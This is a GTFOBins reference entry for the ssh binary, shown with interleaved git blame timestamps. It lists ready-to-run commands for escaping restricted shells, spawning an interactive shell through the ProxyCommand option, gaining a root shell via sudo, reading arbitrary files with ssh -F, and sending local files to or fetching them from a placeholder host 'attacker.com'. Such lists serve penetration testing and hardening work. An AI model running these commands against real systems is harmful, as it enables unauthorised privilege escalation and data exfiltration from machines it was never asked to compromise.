GTFOBins.github.io/_gtfobins/ssh.md

31 lines
1.1 KiB
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- description: Reconnecting may help bypassing restricted shells.
2018-05-28 17:47:54 +02:00
code: ssh localhost $SHELL --noprofile --norc
2018-06-02 17:35:30 +02:00
- description: Spawn interactive shell through ProxyCommand option.
2018-06-03 13:37:40 +02:00
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
2018-06-02 17:35:30 +02:00
sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option.
2018-06-03 13:37:40 +02:00
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
2018-05-21 21:14:41 +02:00
download:
- description: Fetch a remote file from a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=file_to_get
LPATH=file_to_save
2018-05-21 21:14:41 +02:00
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
RPATH=file_to_save
2018-05-21 21:14:41 +02:00
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
2018-05-28 09:44:53 +02:00
file-read:
2018-05-30 20:07:49 +02:00
- description: The read file content is corrupted by error prints.
2018-05-29 17:11:36 +02:00
code: |
2018-05-28 09:44:53 +02:00
LFILE=file_to_read
ssh -F $LFILE localhost
2018-05-21 21:14:41 +02:00
---